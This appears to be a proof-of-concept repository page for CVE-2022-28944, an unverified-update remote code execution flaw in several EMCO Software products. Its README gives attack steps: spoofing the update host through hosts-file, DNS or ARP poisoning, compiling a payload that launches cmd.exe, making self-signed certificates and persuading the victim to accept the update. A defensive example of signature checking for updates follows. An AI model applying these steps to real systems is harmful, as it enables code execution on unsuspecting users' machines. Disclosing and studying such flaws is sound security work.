CVE-2022-28944 PoC — Security vulnerability in multiple EMCO Software products

Source
Associated Vulnerability
Title: Security vulnerability in multiple EMCO Software products (CVE-2022-28944)
Description: Certain EMCO Software products are affected by: CWE-494: Download of Code Without Integrity Check. This affects MSI Package Builder for Windows 9.1.4 and Remote Installer for Windows 6.0.13 and Ping Monitor for Windows 8.0.18 and Remote Shutdown for Windows 7.2.2 and WakeOnLan 2.0.8 and Network Inventory for Windows 5.8.22 and Network Software Scanner for Windows 2.0.8 and UnLock IT for Windows 6.1.1. The impact is: execute arbitrary code (remote). The component is: Updater. The attack vector is: To exploit this vulnerability, a user must trigger an update of an affected installation of EMCO Software.

Multiple products from EMCO Software are affected by a remote code execution vulnerability during the update process.
Readme
# CVE-2022-28944
> EMCO Software Multiple Products Unauthenticated Update Remote Code Execution Vulnerability.

Usage: `python3 cve-2022-28944_poc.py`

Details in the report at [gerr.re](https://gerr.re/posts/cve-2022-28944/).

## Steps to reproduce
1. Install an affected product of EMCO Software;
2. Spoof `storage.emcosoftware.com` so that it resolves to the attacker's IP;
    * For a proof-of-concept edit `c:\windows\system32\drivers\etc\hosts` on target.
        - Note: attackers may e.g. use:
            + poorly configured routers/switches/DNS,
            + DNS spoof / cache poisoning,
            + ARP spoof / cache poisoning.
3. Compile `proof.c` on the attacker, e.g. using `i686-w64-mingw32-gcc proof.c -o proof.exe`;
```c
#include <windows.h>
int main(int argc, char const *argv[]){	
	WinExec("cmd.exe",1);
	return TRUE;
}
```
4. Generate self-signed certificates;
   * e.g. using `openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"`
5. Run the proof-of-concept script;
6. Start the affected product of EMCO Software and either
    * wait a day to trigger update automatically, or
    * trigger the update manually through the application menu;
7. Accept the update in the Update Wizard.
    * Attackers will use a persuasive update description to convince a target to accept the update.
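
The steps above work because the updater runs whatever the host answering as `storage.emcosoftware.com` serves, which is the CWE-494 condition. The check an updater needs is sketched below as an added example (not part of the original README and not EMCO's code): a signature over the package is verified against a public key pinned in the client before anything is executed. Function names are hypothetical, the keys are constructed from Mersenne primes purely so the demo runs offline, and RSA is done with the standard library only; a real updater would use a vetted crypto library and a properly generated vendor key.

```python
import hashlib
import hmac

# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2).
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")

def emsa_pkcs1_v15(data: bytes, k: int) -> bytes:
    """EMSA-PKCS1-v1_5 encoding of SHA-256(data) for a k-byte modulus."""
    t = SHA256_PREFIX + hashlib.sha256(data).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def verify_update(package: bytes, signature: bytes, n: int, e: int) -> bool:
    """True only if signature is valid over package under the pinned key (n, e)."""
    k = (n.bit_length() + 7) // 8
    if len(signature) != k:
        return False
    s = int.from_bytes(signature, "big")
    if s >= n:
        return False
    recovered = pow(s, e, n).to_bytes(k, "big")
    # Compare with a freshly built encoding; never parse the recovered padding.
    return hmac.compare_digest(recovered, emsa_pkcs1_v15(package, k))

def rsa_sign(package: bytes, n: int, d: int) -> bytes:
    """Build-server side signing, present only so the demo runs offline."""
    k = (n.bit_length() + 7) // 8
    m = int.from_bytes(emsa_pkcs1_v15(package, k), "big")
    return pow(m, d, n).to_bytes(k, "big")

# Constructed demo keys from Mersenne primes: NOT secure, illustration only.
E = 65537
def demo_key(p: int, q: int):
    return p * q, pow(E, -1, (p - 1) * (q - 1))

VENDOR_N, VENDOR_D = demo_key(2**521 - 1, 2**607 - 1)   # public part pinned in client
ROGUE_N, ROGUE_D = demo_key(2**607 - 1, 2**1279 - 1)    # key held by a spoofed server

def demo():
    genuine = b"constructed genuine update package"
    planted = b"constructed replacement served from a spoofed host"
    good_sig = rsa_sign(genuine, VENDOR_N, VENDOR_D)
    return {
        "genuine": verify_update(genuine, good_sig, VENDOR_N, E),
        "swapped_body": verify_update(planted, good_sig, VENDOR_N, E),
        "rogue_key": verify_update(planted, rsa_sign(planted, ROGUE_N, ROGUE_D), VENDOR_N, E),
    }

if __name__ == "__main__":
    print(demo())
```

Because the decision depends only on the pinned key, a self-signed certificate for the update host or a redirected DNS name does not change the outcome: the replacement package is rejected in both failure cases.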

File Snapshot

```
[4.0K] /data/pocs/cdf5ed477b1ac184da505157a7b30010e90b6d4c
├── [2.0K] cve-2022-28944_poc.py
├── [1.4M] cve-2022-28944_public-advisory.pdf
├── [ 100] proof.c
└── [1.4K] README.md

0 directories, 4 files
```